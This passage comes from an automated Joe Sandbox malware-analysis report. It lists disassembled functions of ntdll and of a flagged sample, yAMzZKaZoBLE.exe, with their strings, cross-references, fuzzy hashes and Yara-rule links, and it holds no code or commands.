CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01324742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01324725
CLIENT(ntdll): Processing section info %ws..., xrefs: 01324787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013246FC

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 59d87dd2310a48cd89c4f893b6799ce62e2525bd5535920a059ed239ccebe6a4
Instruction ID: ce93c53b37f40ebc8fd8b64de25ba11f0575e226d603858d258281758406d11f
Opcode Fuzzy Hash: 59d87dd2310a48cd89c4f893b6799ce62e2525bd5535920a059ed239ccebe6a4
Instruction Fuzzy Hash: AE512D3161021ABEEF15EAA9DC49FFE77ECAF14318F4400A9D605A7190D7709A458F91

Function 01386940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: fa25a6528329eb523fac7d50ded74a1030cad8f69a337f4e420542d5ca3877bd
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 8B0226B1508342AFD705EF28C590A6BBBE5EFC8708F14892DFA894B250DB31E905CB52

Function 012FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 012FB6BF

Strings

0, xrefs: 012FB695
-, xrefs: 012FB650
+, xrefs: 012FB65A
0, xrefs: 012FB66F

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: b646757ba961a5c656adcf50d40cc58830731fd1d0598c3929c24ad7da836908
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 6D81C471E2524A9EEF298E6CC8917FEFBB6AF85310F18413DDB51A7291C7349840CB51

Function 013620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0136214F
___swprintf_l.LIBCMT ref: 01362172

Strings

[, xrefs: 0136212B
]:%u, xrefs: 01362169
%%%u, xrefs: 01362146

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 631b5212e18170cc8d30d743925272fe88b4c58d16606adab46742ec4b5c3fd6
Instruction ID: e034b90363cb26b2bc1bc9a27a1908b42cb1dac76435215e1113819f6ce17896
Opcode Fuzzy Hash: 631b5212e18170cc8d30d743925272fe88b4c58d16606adab46742ec4b5c3fd6
Instruction Fuzzy Hash: D021537AE10119ABDB11DF69CC50AFFBBECAF54644F45412AEA05E3244E730DA018BA1

Function 012DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013202BD
RTL: Re-Waiting, xrefs: 0132031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013202E7

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 2baf1246633fd5589f2515e8694a1935798e695677fd8bf32cc92698d79eba29
Instruction ID: 7e638f1b3811ec7747c9ef44a37ad9a76dad0e942394bdd57bafc51da1f839e9
Opcode Fuzzy Hash: 2baf1246633fd5589f2515e8694a1935798e695677fd8bf32cc92698d79eba29
Instruction Fuzzy Hash: 86E1D0306247429FE729DF28C985B2ABBE0BB85318F140A1DF6A6CB2D1D774D845CB46

Function 012EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01327BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01327B7F
RTL: Resource at %p, xrefs: 01327B8E

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 14f6519e90b43f85c974d7ead204bebdc610a152bf8ed021548880b75d9bf7b0
Instruction ID: 58c1577a418514c554c650ee6ac3f2938842ec7aa93f5928937dbe68893a2073
Opcode Fuzzy Hash: 14f6519e90b43f85c974d7ead204bebdc610a152bf8ed021548880b75d9bf7b0
Instruction Fuzzy Hash: A74100357117039FDB21DE29C845B2AB7E5FF98714F400A2DFA5ADB280DB71E8058B91

Function 012EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0132728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01327294
RTL: Re-Waiting, xrefs: 013272C1
RTL: Resource at %p, xrefs: 013272A3

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 782a50b727ef608923bdca9b373c9aa49e7cb93ad4e7917bcfdb2cea8448fdac
Instruction ID: 6297b7758375786c06dddc017f1926b91395ea9337147247bd4e7c923fd4e7f5
Opcode Fuzzy Hash: 782a50b727ef608923bdca9b373c9aa49e7cb93ad4e7917bcfdb2cea8448fdac
Instruction Fuzzy Hash: E1411035710317ABD721EE29CC41B66B7E5FBA5718F100618F955EB280DB30F81287D1

Function 01362300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0136238D
___swprintf_l.LIBCMT ref: 013623B3

Strings

]:%u, xrefs: 013623AA
%%%u, xrefs: 01362384

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 2272d77e717a04d85afe40aa72648bb9367b98ffc0655b5d5d9e4ad406818bcd
Instruction ID: 6aa4cfbdc1bcde0061fe3b1d1fc6005183e242fc3a2a2f81e8bfb425a07d9095
Opcode Fuzzy Hash: 2272d77e717a04d85afe40aa72648bb9367b98ffc0655b5d5d9e4ad406818bcd
Instruction Fuzzy Hash: E531B172A102199FDB20DE2DCC40BFFB7FCEB04654F95445AE949E3244EB30AA448BA0

Function 012F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 012F7E8B

Strings

-, xrefs: 012F7DDD
+, xrefs: 012F7DE8

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 9f408157e56de124c8c1721d2097cd780b54ddc73620f8655f6fcaf4da779e85
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 4591A071E2020B9BEB24DF6DC881ABEFBA5AF44720F54463EEB55E72C0D77099418B11

Function 012B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 012B9191
@, xrefs: 012B9175

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: e31412a27819a56ac075f15c5fff98fe3796d95f8599dea1220f368bbfda1465
Instruction ID: 955be05cc14bd9113e5acc8b9b073c78985e4d7be319e5d620215bf1b216e059
Opcode Fuzzy Hash: e31412a27819a56ac075f15c5fff98fe3796d95f8599dea1220f368bbfda1465
Instruction Fuzzy Hash: D6811BB1D10269DBDB35CB54CC45BEEB6B8AF08754F1041EAEA19B7280E7705E84CFA0

Analysis Process: yAMzZKaZoBLE.exePID: 1680, Parent PID: 6484COMMON

Executed Functions

Function 06940C17 Relevance: 49.3, Strings: 39, Instructions: 546COMMON

Download Yara Rule

Strings

\, xrefs: 06940DF0
5?, xrefs: 06940D35
$, xrefs: 0694105E
Y, xrefs: 06940EAD
r, xrefs: 0694109A
%, xrefs: 06940DFA
CY, xrefs: 06940FEE
T, xrefs: 06940FB2
U, xrefs: 06940E8F
*, xrefs: 06941004
y8, xrefs: 06940CCA
6, xrefs: 06940FE4
_S, xrefs: 06940D16
0, xrefs: 06940EA3
+U, xrefs: 069410D5
Z^, xrefs: 06940CFA
,, xrefs: 06941068
KS, xrefs: 069410DF
K, xrefs: 06941033
;, xrefs: 06940FC6
e, xrefs: 06940C3F
H, xrefs: 069413CF
{, xrefs: 06940E3D
Q/, xrefs: 06940EF7
Lg, xrefs: 06940F0B
7+, xrefs: 06940F15
7, xrefs: 06941086
_, xrefs: 0694120B
3|, xrefs: 06940D82
_, xrefs: 06941054
4H, xrefs: 06940C35
b0, xrefs: 069410CB
hn, xrefs: 069410C1
w, xrefs: 06940CF3
3, xrefs: 06941022
A, xrefs: 06940DBE
k, xrefs: 06940FD0
d, xrefs: 06940EB7
S>, xrefs: 06940DA0

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: H$$$%$*$+U$,$0$3$3|$4H$5?$6$7$7+$;$A$CY$K$KS$Lg$Q/$S>$T$U$Y$Z^$\$_$_$_S$b0$d$e$hn$k$y8${$r$w
API String ID: 0-3379787838
Opcode ID: 419616535afcaea51a79b995b0791de3af91ac0817ce7968215ff13381c5686a
Instruction ID: f34d0e6ba109e2944340b1938a8f65d165bca6d48bce0ffd031dac1e179b7cc4
Opcode Fuzzy Hash: 419616535afcaea51a79b995b0791de3af91ac0817ce7968215ff13381c5686a
Instruction Fuzzy Hash: CE628FB0D05269CBEB64CF44C998BEDBBB2BB45308F1085DAC50A6B681C7B95AC5CF44

Function 0694EC37 Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

O, xrefs: 0694ECC5
\, xrefs: 0694ECD3
S, xrefs: 0694ECB7
s, xrefs: 0694ECBE
6, xrefs: 0694ECCC

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 814b45643327bebb28a3088be35c8c28142840369090c1571483bebca8b56f33
Instruction ID: 7894ccf305bef3f2f0c98384e30ce2a856f4ad8c71033656ccdab35136f6dfe3
Opcode Fuzzy Hash: 814b45643327bebb28a3088be35c8c28142840369090c1571483bebca8b56f33
Instruction Fuzzy Hash: 8351A272D01218ABDB50EF95DC88EEEB378EF84314F10819AED18AB500E7755B14CBE1

Function 0695BE97 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

>4, xrefs: 0695BEF0

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: >4
API String ID: 0-564722999
Opcode ID: 65184ae1cbc2ba167ef6e977f363a5c1de3d8fdd35628987be6cd81c5732c550
Instruction ID: 0afa11ee795c72f82db0e545dfc28feeb1cc504cf34b7bf59e58798888cb10e8
Opcode Fuzzy Hash: 65184ae1cbc2ba167ef6e977f363a5c1de3d8fdd35628987be6cd81c5732c550
Instruction Fuzzy Hash: CC21FEB6D01219AF8B40DFE9D9419EFB7F9EF88210F14415AE919E7200E7715A05CBE0

Function 0695D1D7 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

Q, xrefs: 0695D222

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: Q
API String ID: 0-650534144
Opcode ID: 20d5056939cd45569882252b3b5a90914c7fc3c5b9a36c552dc82201431fc8ee
Instruction ID: ce1bd7a56477414ec50855c5c06e6f55104f665e83542767fa1bb82183a497f3
Opcode Fuzzy Hash: 20d5056939cd45569882252b3b5a90914c7fc3c5b9a36c552dc82201431fc8ee
Instruction Fuzzy Hash: 1711DAB6D0121DAF8B40DFE9DC409EEB7F9EF88210F14456AE919E7200E7719A15CBA0

Function 06939FA8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091d545b3cee007fa08927370cd8f40a088f03e092123305d49f9b98b84cb01d
Instruction ID: 832fd47f390b31bbd64d3f9ed71c592f16d1ad086cd84259cdd5cc85361bf8ff
Opcode Fuzzy Hash: 091d545b3cee007fa08927370cd8f40a088f03e092123305d49f9b98b84cb01d
Instruction Fuzzy Hash: 9A41EDB1D11229AFDB44CF99DC81AEEBBB8EF49710F10415AF914E6240E7B19640CBA5

Function 0695F5E7 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d012f3ec2dc179e330554f8655299d912ee6bb68aa3c84db944aba2bee75eb8c
Instruction ID: 78668a76acf63bf8eda5a085c0e4b359cb7419cd50e1b710af5157849b1c415f
Opcode Fuzzy Hash: d012f3ec2dc179e330554f8655299d912ee6bb68aa3c84db944aba2bee75eb8c
Instruction Fuzzy Hash: 6D31F9B5A00648AFCB54DF99CC81EEFB7B9EF88310F108209FD58A7644D735A911CBA1

Function 0695FF47 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e52d4157bf0d6c785f8f6881f26e0ba0d57ffb55648ddd27d9c88e4455ccf8a7
Instruction ID: 91b63cacff419bb69062f32289be3fd71cfa0640638b2908945483ba6f2a3915
Opcode Fuzzy Hash: e52d4157bf0d6c785f8f6881f26e0ba0d57ffb55648ddd27d9c88e4455ccf8a7
Instruction Fuzzy Hash: 4A216DB1A00248AFDB54DF98CC41EEFB7B8EF88310F108109FD189B640D771A915CBA5

Function 0694EA77 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536656f6e2d76ffcb6aa2db76184ca90ff00c615fb0e28e20dda659658077866
Instruction ID: c2e0d63d54e9fac9a512fed6360ebb6e25f8bb9565ac9d51ca263f170a80f0e3
Opcode Fuzzy Hash: 536656f6e2d76ffcb6aa2db76184ca90ff00c615fb0e28e20dda659658077866
Instruction Fuzzy Hash: 1B1186723803057BF760EA598C42FAB376CDFC5B24F244415FF18AAAC0D6A5B81197B4

Function 0695F277 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7440db7b94fcdedbdb96086b48fc4bb48f0779b3d42a42d61e665fd8bc9ad66e
Instruction ID: 00e61e6ac5aaec05edf105c630f5de1c487f0bbfbda74867aafcb9680fb62690
Opcode Fuzzy Hash: 7440db7b94fcdedbdb96086b48fc4bb48f0779b3d42a42d61e665fd8bc9ad66e
Instruction Fuzzy Hash: A4115EB1A003846FDB50EB98CC41FAF776CEFC9710F104509FE195B640D6756915CBA5

Function 0695F3F7 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1ea5aa22ef8e8ec5f988b97a5f3e17188345bc7557fe3c39a6ec00322e3ec8
Instruction ID: 46fbc90e7894a704a6b5d54c53e93fb7d16214a3c326744d75444d3e24807973
Opcode Fuzzy Hash: ea1ea5aa22ef8e8ec5f988b97a5f3e17188345bc7557fe3c39a6ec00322e3ec8
Instruction Fuzzy Hash: 1C118BB1A013946BDB50EBA8CC41FAFB7ACEBC5710F004509FA699B680D6716A11CBA1

Function 0693A0FC Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45faae5d5a19c0e0b43d4f18fc3a7927c238cdc82f3931f14d94c674eff4c4b6
Instruction ID: a267657a487d1f3d6ebb26982ced652f6e8d365232b1a731d0a4f3398f75b529
Opcode Fuzzy Hash: 45faae5d5a19c0e0b43d4f18fc3a7927c238cdc82f3931f14d94c674eff4c4b6
Instruction Fuzzy Hash: F7F021736442262BD75059A99C40F9AB7C8EF85630F140112F8A8C7A81D332D451C790

Function 069602B7 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01cd064d6552d5f2cf89f5c8ba85a2642588893491891f8a1591fcff336c04c6
Instruction ID: 74489420f41d416a78aec9365a61567058caa7f1e86bb748635b895ae67dda97
Opcode Fuzzy Hash: 01cd064d6552d5f2cf89f5c8ba85a2642588893491891f8a1591fcff336c04c6
Instruction Fuzzy Hash: EF0184B6214248BBCB44DF9DDC91EEB77ADAF8C714F008108BA1DD7240D630F8518BA4

Function 0695BE07 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25edb2828b0b585bfefd22200066e61b5e61349b6c712212f040b62090ee2aa0
Instruction ID: d03baf2c3b798b45bffa40dcb58e817f005196647199ccf90102856c3bfdfdc5
Opcode Fuzzy Hash: 25edb2828b0b585bfefd22200066e61b5e61349b6c712212f040b62090ee2aa0
Instruction Fuzzy Hash: 8B01DBF2C1121DAE8B80DFE8D9409EEBBF9FF48200F14416EE519F2240F77156048BA5

Function 0695F4F7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30a5dfb9f7064aa9f0832d90902ea30df30e8d600081ca2a7d1655f7301712e
Instruction ID: 5b098bddb628c4811786cd219a9ecdd89c0fcc7e4efff41ddf341a93b93352a8
Opcode Fuzzy Hash: d30a5dfb9f7064aa9f0832d90902ea30df30e8d600081ca2a7d1655f7301712e
Instruction Fuzzy Hash: 15F08CB62002487FDB10DF9DDC41E9B73ADEFC9610F004009FA2897200D630B9218BB5

Function 0694EB97 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a56f1866bdde1c370606ddf9861883a8ad16d0273c50ecff81ed478c0b507299
Instruction ID: 2c5da00784bec97a0fd8f43e3772f91c65cb5d725d095e2df02bb823bc5aec48
Opcode Fuzzy Hash: a56f1866bdde1c370606ddf9861883a8ad16d0273c50ecff81ed478c0b507299
Instruction Fuzzy Hash: FDF08271C15208EBDB14DF64D841BDDBBB8EB04320F2047ADE8259B6C0E6349B508B81

Function 069601D7 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction ID: 7cb674163698b6615b6c9da0ebfef2d7a90646178b6a13fee35f31c6b05f03ff
Opcode Fuzzy Hash: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction Fuzzy Hash: 13E06DB22002547BD654EF59DC41EAB37ACEFC9710F004419F918A7641C631B81087B9

Function 06962057 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18a88b7d1acc54bea3815d2127ad9c3614be64530d83c62147c7fbd63feeeef
Instruction ID: baea3d52ca8cc4c3535e5ac90e99d25809c6c5477339489cd959e6deecf2e064
Opcode Fuzzy Hash: d18a88b7d1acc54bea3815d2127ad9c3614be64530d83c62147c7fbd63feeeef
Instruction Fuzzy Hash: 6AE08636A0131437D660579A9C05F97775CCFC1E60F190165FE1C9B740E575BA01C2E4

Function 0695FEB7 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction ID: b6edb92dee53c84ef0ebc5bf72e79c504fdd0a6b7221f81d29a416e20f1fbe2e
Opcode Fuzzy Hash: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction Fuzzy Hash: B6E0467A2103547BC660FA5ACC41FAB77ACDBC6724F008059FA58AB640C672B92187B5

Function 0694184C Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f8e5b15b6a659ce40bf54cbdd704882031db06dbbc932ea22fd85fee73e287
Instruction ID: 0717c66875d3652b6b8d6c88e79f6337faba2ded0b3105f5bf2a6926245384ca
Opcode Fuzzy Hash: 68f8e5b15b6a659ce40bf54cbdd704882031db06dbbc932ea22fd85fee73e287
Instruction Fuzzy Hash: C890029518008DE64D9276645B40D575D1344C75612910754E5636E547A78148A01832

Non-executed Functions

Function 06940C0A Relevance: 46.4, Strings: 37, Instructions: 173COMMON

Download Yara Rule

Strings

\, xrefs: 06940DF0
5?, xrefs: 06940D35
$, xrefs: 0694105E
Y, xrefs: 06940EAD
r, xrefs: 0694109A
%, xrefs: 06940DFA
CY, xrefs: 06940FEE
T, xrefs: 06940FB2
U, xrefs: 06940E8F
*, xrefs: 06941004
y8, xrefs: 06940CCA
6, xrefs: 06940FE4
_S, xrefs: 06940D16
0, xrefs: 06940EA3
+U, xrefs: 069410D5
Z^, xrefs: 06940CFA
,, xrefs: 06941068
KS, xrefs: 069410DF
K, xrefs: 06941033
;, xrefs: 06940FC6
e, xrefs: 06940C3F
{, xrefs: 06940E3D
Q/, xrefs: 06940EF7
Lg, xrefs: 06940F0B
7+, xrefs: 06940F15
7, xrefs: 06941086
3|, xrefs: 06940D82
_, xrefs: 06941054
4H, xrefs: 06940C35
b0, xrefs: 069410CB
hn, xrefs: 069410C1
w, xrefs: 06940CF3
3, xrefs: 06941022
A, xrefs: 06940DBE
k, xrefs: 06940FD0
d, xrefs: 06940EB7
S>, xrefs: 06940DA0

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
